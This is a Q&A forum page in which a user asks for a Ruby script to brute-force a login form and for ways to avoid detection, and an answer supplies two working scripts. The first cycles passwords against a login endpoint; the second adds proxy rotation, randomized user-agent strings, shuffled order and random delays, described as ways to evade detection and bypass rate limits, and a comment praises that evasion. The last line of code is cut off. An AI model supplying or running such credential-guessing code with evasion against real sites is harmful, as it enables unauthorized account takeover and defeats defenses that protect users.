How can I write a Ruby script to automate the process of brute-forcing a login form

+1 vote
I’m learning about ethical hacking techniques, and I’m trying to create a simple Ruby script that automates brute-force attacks on login forms for testing purposes. I’ve identified a vulnerable test server and I want to experiment with different combinations of usernames and passwords, but I’m not sure how to properly send HTTP requests in Ruby or handle form submission in the script.

Could someone guide me through writing a basic Ruby script to brute-force a login form? I’d also appreciate any advice on rate-limiting issues or how to avoid being detected by security mechanisms.
Oct 17 in Cyber Security & Ethical Hacking by Anupam
• 6,190 points
97 views

1 answer to this question.

+1 vote

In order to create a Ruby script that can automate the process of brute-forcing a login form, we can use the net/http library.

1. Here's an example where we're using the net/http library to brute-force a login form. This script will send HTTP POST requests with different username & password combinations:

require 'net/http'
require 'uri'

uri = URI.parse("<target_url>")

username = "admin"
passwords = ["password1", "password2", "123456", "admin"]

passwords.each do |password|
  response = Net::HTTP.post_form(uri, 'username' => username, 'password' => password)
  if response.body.include?("Welcome")
    puts "Password found: #{password}"
    break
  end
end

Now, this script will attempt each password from the list and check if the response contains the word "Welcome".

2. To avoid any kind of detection, we can implement delays between requests and consider randomizing the order of password attempts.

3. In order to bypass rate-limiting mechanisms, we can rotate the IP addresses by using proxies, or change the user-agent header, or use different network identities for each request.

Here's an example where we're using proxy rotation in Ruby:

require 'net/http'
require 'uri'

proxies = [
  { ip: '192.168.1.1', port: 8080 },
  { ip: '192.168.1.2', port: 8080 },
  { ip: '192.168.1.3', port: 8080 }
]

def brute_force_login_with_proxy_rotation(url, username, password_list, proxies)
  password_list.shuffle.each_with_index do |password, index|
    proxy = proxies[index % proxies.length]
    proxy_uri = URI.parse("http://#{proxy[:ip]}:#{proxy[:port]}")

    Net::HTTP::Proxy(proxy_uri.host, proxy_uri.port).start(proxy_uri.host) do |http|
      uri = URI.parse(url)
      request = Net::HTTP::Post.new(uri.path)
      request.set_form_data('username' => username, 'password' => password)
      
      request['User-Agent'] = "Mozilla/#{rand(40..99)}.0"

      response = http.request(request)

      if response.body.include?('Welcome')
        puts "Success! Password is: #{password}"
        break
      else
        puts "Failed attempt with password: #{password}"
      end

      sleep(rand(1..5))
    end
  end
end

url = "<target_url>"
username = "admin"
password_list = ["password123", "admin123", "qwerty", "letmein"]
brute_force_login_with_proxy_rotation(url, username, password_list, proxies
answered Oct 23 by CaLLmeDaDDY
• 8,790 points
This is such a clear example of how to use Ruby for automating tasks! I like how you’ve added proxy rotation to avoid detection—it makes the script much more robust.

Related Questions In Cyber Security & Ethical Hacking

0 votes
1 answer

How can I force the login to a specific ip address?

Try to access the router's default page. It's ...READ MORE

answered Feb 15, 2022 in Cyber Security & Ethical Hacking by Edureka
• 12,690 points
1,462 views
+1 vote
1 answer

How do you decrypt a ROT13 encryption on the terminal itself?

Yes, it's possible to decrypt a ROT13 ...READ MORE

answered Oct 17 in Cyber Security & Ethical Hacking by CaLLmeDaDDY
• 8,790 points
122 views
+1 vote
1 answer
+1 vote
1 answer
+1 vote
1 answer
+1 vote
1 answer
webinar REGISTER FOR FREE WEBINAR X
REGISTER NOW
webinar_success Thank you for registering Join Edureka Meetup community for 100+ Free Webinars each month JOIN MEETUP GROUP